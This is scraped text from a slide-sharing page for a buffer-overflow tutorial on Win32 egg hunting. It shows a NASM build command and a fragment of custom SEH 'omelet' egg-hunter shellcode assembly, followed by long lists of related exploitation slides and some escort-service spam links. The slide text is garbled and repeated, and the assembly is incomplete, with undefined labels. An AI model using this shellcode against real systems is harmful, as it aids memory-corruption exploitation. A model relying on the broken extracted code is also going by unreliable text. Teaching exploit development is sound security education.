Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm build C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>"c:Program Filesnasmnasm.exe" -f bin -o cust om_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin she llcode.bin calceggs_custom.txt 127 0xBADA55
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Thank You :) See you the week after next week

Recommended

A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPsanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 

Recommended

A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPsanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-driversyushiang fu
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析Mr. Vengineer
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?Mr. Vengineer
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world! Hacks in Taiwan (HITCON)
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 

More Related Content

What's hot

TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析Mr. Vengineer
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?Alexandre Moneger
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?Mr. Vengineer
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 

What's hot (20)

TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an Exploit
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friends
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 

Similar to System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxyBo-Yi Wu
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovPivorak MeetUp
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
Code Red Security
Code Red SecurityCode Red Security
Code Red SecurityAmr Ali
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Svetlana Gaivoronski
 
Automated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumerationAutomated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumerationRuo Ando
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionlinuxlab_conf
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerMarina Kolpakova
 
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO32018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3TYPO3 CertiFUNcation
 
Initiation concrète-à-la-virtualisation-devoxx-fr-2021
Initiation concrète-à-la-virtualisation-devoxx-fr-2021Initiation concrète-à-la-virtualisation-devoxx-fr-2021
Initiation concrète-à-la-virtualisation-devoxx-fr-2021Pierre-Antoine Grégoire
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceSUSE Labs Taipei
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 

Similar to System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting (20)

A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy
2014 OSDC Talk: Introduction to Percona XtraDB Cluster and HAProxy
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene Pirogov
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
 
Automated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumerationAutomated reduction of attack surface using call graph enumeration
Automated reduction of attack surface using call graph enumeration
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
 
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO32018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3
2018 - CertiFUNcation - Helmut Hummel: Hardening TYPO3
 
Initiation concrète-à-la-virtualisation-devoxx-fr-2021
Initiation concrète-à-la-virtualisation-devoxx-fr-2021Initiation concrète-à-la-virtualisation-devoxx-fr-2021
Initiation concrète-à-la-virtualisation-devoxx-fr-2021
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to Userspace
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 

Recently uploaded

Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Clustering techniques data mining book ....
Clustering techniques data mining book ....Clustering techniques data mining book ....
Clustering techniques data mining book ....ShaimaaMohamedGalal
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
